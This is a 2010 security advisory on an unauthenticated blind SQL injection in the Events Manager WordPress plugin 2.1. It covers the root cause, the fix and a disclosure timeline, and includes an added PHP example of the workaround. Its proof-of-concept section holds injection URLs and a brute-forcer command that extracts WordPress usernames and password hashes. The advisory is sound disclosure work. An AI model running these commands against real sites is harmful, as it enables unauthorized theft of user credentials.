Events Manager Wordpress Plugin 2.1 Blind SQL Injection

2010-05-12T00:00:00
ID PACKETSTORM:89435
Type packetstorm
Reporter Danilo Massa
Modified 2010-05-12T00:00:00

Description

=============================================
- Release date: May 10th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Events Manager Wordpress plugin <= 2.1 Blind SQL Injection  
II. BACKGROUND
-------------------------
Events Manager 2.0 is a full-featured event management solution for Wordpress.
Events Manager supports recurring events, location data, RSVP and maps.
With Events Manager you can plan and publish your tour, or let people reserve
spaces for your weekly meetings.
You can then add event lists, calendars and descriptions to your blog using a sidebar
widget or shortcodes; if you're a web designer you can simply employ the template tags
provided by Events Manager.
III. INTRODUCTION
-------------------------
Events Manager versions 2.0rc2 and 2.1 have a blind SQL injection when a single event page is
shown to users. No authentication is required.
IV. DESCRIPTION
-------------------------
Input passed via the "event_id" parameter to the admin-defined event page is not properly
sanitised before being used in a SQL query.
This happens in the events-manager.php file at the following lines (version 2.1):
436: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']);
534: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']);
dbem_sanitize_request only quotes SQL reserved characters and does not force the event_id parameter
to be an integer.
  
V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on the page that shows a single event.
http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=1
http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=0
A more complex test case can be executed using Blind Sql Injection Brute Forcer version 2:
./bsqlbf-v2-4.pl -url http://<wordpress_site>/<event_page>?event_id=<existing_event_id> -blind event_id -sql "(SELECT concat(user_login,0x3a,user_pass) from wp_users limit 0,1)" -database 1 -type 0 -match "<string_in_existing_event_web_page>"
retrieving the first user in the Wordpress database and its password hash.
VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve any data from
the databases accessible to the Wordpress database user.
VII. SYSTEMS AFFECTED
-------------------------
Versions 2.0rc2 and 2.1 are vulnerable.  
Versions <= 2.0rc2 could be vulnerable.  
VIII. SOLUTION
-------------------------
Upgrade to a patched release (>= 2.2) or, as a quick workaround, add
settype($event_ID, "int");
just after the lines listed in the DESCRIPTION section.
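To make the root cause and the workaround concrete, the following is an added PHP example; it is not code from the advisory or from the plugin. The stand-in for dbem_sanitize_request() (modelled with addslashes()), the table name wp_dbem_events and the sample inputs are assumptions.

```php
<?php
// Added example, not the plugin's code: why escaping quotes does not protect an
// unquoted integer comparison, and what the settype() workaround changes.

// Stand-in for dbem_sanitize_request(). The advisory says it only quotes SQL
// reserved characters, so addslashes() is assumed here to model that behaviour.
function sanitize_like_plugin(string $value): string
{
    return addslashes($value);
}

// Vulnerable pattern (events-manager.php 2.1, lines 436/534): the value is
// escaped but never coerced, then placed in a numeric comparison without
// quotes, so "7 and 1=0" arrives unchanged. Table name is an assumption.
function build_query_vulnerable(string $raw): string
{
    $event_ID = sanitize_like_plugin($raw);
    return "SELECT * FROM wp_dbem_events WHERE event_id = $event_ID";
}

// Workaround from section VIII: settype() right after the sanitize call.
// PHP keeps only the leading integer of the string ("7 and 1=0" becomes 7,
// "abc" becomes 0), so no SQL fragment can reach the query.
function build_query_fixed(string $raw): string
{
    $event_ID = sanitize_like_plugin($raw);
    settype($event_ID, "int");
    return "SELECT * FROM wp_dbem_events WHERE event_id = $event_ID";
}

// In a WordPress plugin the idiomatic form is $wpdb->prepare() with a %d
// placeholder, which applies the same integer coercion:
//   $wpdb->prepare("SELECT * FROM wp_dbem_events WHERE event_id = %d", $raw);

// Constructed inputs: a normal id and the harmless test value from section V
// (event_id=<id>%20and%201=0 decodes to "<id> and 1=0").
foreach (["7", "7 and 1=0"] as $raw) {
    echo "input: $raw\n";
    echo "  vulnerable: " . build_query_vulnerable($raw) . "\n";
    echo "  fixed:      " . build_query_fixed($raw) . "\n";
}
```

Run it with the PHP CLI; the vulnerable builder passes the trailing condition straight into the WHERE clause, while the fixed builder emits only the integer 7.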
IX. REFERENCES
-------------------------
http://davidebenini.it/wordpress-plugins/events-manager/  
http://davidebenini.it/blog/  
X. CREDITS
-------------------------
The vulnerability was discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com  
XI. VULNERABILITY HISTORY
-------------------------
April 08th, 2010: Vulnerability identification
April 09th, 2010: Vendor notification
April 10th, 2010: Vendor released an updated version (2.2)
May 10th, 2010: Vulnerability disclosure  
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this   
information.  